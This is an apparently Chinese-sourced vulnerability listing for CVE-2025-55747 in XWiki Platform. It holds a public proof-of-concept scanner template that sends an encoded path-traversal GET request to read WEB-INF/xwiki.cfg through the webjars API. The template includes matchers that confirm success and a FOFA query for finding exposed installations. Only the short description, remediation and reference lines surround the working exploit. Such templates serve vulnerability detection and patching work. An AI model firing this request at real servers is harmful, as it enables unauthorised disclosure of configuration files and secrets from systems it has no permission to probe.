漏洞描述
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 6.1-milestone-2 through 16.10.6, configuration files are accessible through the webjars API.
CVE-2025-55747: XWiki Platform - Information Disclosure
PoC代码[已公开]
id: CVE-2025-55747
info:
name: XWiki Platform - Information Disclosure
author: Redmomn
severity: high
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In versions 6.1-milestone-2 through 16.10.6, configuration files are accessible through the webjars API.
impact: |
Remote attackers can access sensitive configuration files, potentially exposing critical information.
remediation: |
Update to version 16.10.7 or later.
reference:
- https://jira.xwiki.org/browse/XWIKI-19350
- https://nvd.nist.gov/vuln/detail/CVE-2025-55747
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2025-55747
epss-score: 0.04046
epss-percentile: 0.88009
cwe-id: CWE-23
metadata:
verified: true
fofa-query: app="XWIKI-Platform"
tags: cve,cve2025,xwiki,lfi,vuln
http:
- method: GET
path:
- '{{BaseURL}}/xwiki/webjars/wiki%3Axwiki/..%2F..%2F..%2F..%2F..%2FWEB-INF%2Fxwiki.cfg'
matchers:
- type: dsl
dsl:
- 'contains_all(body, "xwiki.editcomment=","xwiki.plugins=","xwiki.encoding=")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402201534b5f58d19a0fa9fb99abb67c4578e4856bb912628545aea9d1e6cee7a239b022019ed417fbca8e0436ae6905f66c488f0ddd67dc67c1c8a72947305f4603b2f7e:922c64590222798bb761d5b6d8e72950